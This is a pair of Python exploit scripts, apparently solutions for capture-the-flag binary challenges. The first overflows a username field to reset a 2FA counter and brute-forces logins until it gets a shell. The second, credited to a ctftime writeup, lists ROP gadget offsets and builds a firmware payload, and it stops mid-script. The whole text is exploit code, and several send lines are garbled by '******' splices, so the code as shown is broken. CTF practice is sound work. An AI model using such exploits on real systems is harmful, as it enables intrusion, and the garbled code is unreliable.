import interact
import struct
p = interact.Process()
# Overflow name and set refresh to 0
data = p.readuntil('Enter Admin Username:'******'A'*16 + '\x00'*8)
data = p.readuntil('Enter your 2FA Code:')
# Spam login attempts
while True:
data = p.readuntil('Enter Admin Username:'******'A'*8)
data = p.readuntil('Enter your 2FA Code:')
p.sendline('0'*20)
data = p.readuntil('!')
if 'shell' in data:
p.sendline('cat flag')
break
p.interactive()
# This writeup is based off of: https://ctftime.org/writeup/11273
# Import the python libraries, and establish the target
import interact
import struct
target = interact.Process()
# Declare needed rop gadgets offsets
popRdi = 0x21102
popRax = 0x33544
popRsi = 0x202e8
popRdx = 0x1b92
binsh = 0x18cd57
syscall = 0xbc375
addRsp = 0xc96a6
# A function desgined to just setup initial firmware to enable debugging
def debugFirmware():
target.sendline('U')
initialFirmware = "FW" + "\xa2\xc8" + "1081" + "9"
initialFirmware = initialFirmware + "\x00" * (0x400 - len(initialFirmware))
target.sendline(initialFirmware)
target.sendline(initialFirmware)
target.sendline('E')
